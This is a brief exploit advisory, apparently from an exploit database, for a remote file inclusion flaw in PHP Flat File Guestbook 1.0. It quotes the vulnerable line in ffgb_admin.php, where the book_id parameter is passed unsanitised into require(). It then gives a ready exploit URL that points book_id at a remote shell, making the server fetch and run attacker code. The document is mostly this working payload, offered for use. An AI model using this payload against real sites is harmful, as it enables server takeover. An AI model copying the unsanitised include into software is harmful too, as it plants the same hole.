# Exploit Title: Rfi PHP Flat File Guestbook # Date: 11-08-2011 # Author: RiRes Walid # Vendor or Software Link: http://www.advancebydesign.com # Version: 1.0 # Google dork: # Tested on: Xp sp2 ------------------------------------------------------------ Remote File Inclusion in ffgb_admin.php line : 339 require('ffgb_comments/ffgb_'.$_GET['book_id'].'.php'); [o] Exploit http://localhost/[path]/ffgb_admin.php?book_id=http://shell? -------------------------------------------------------------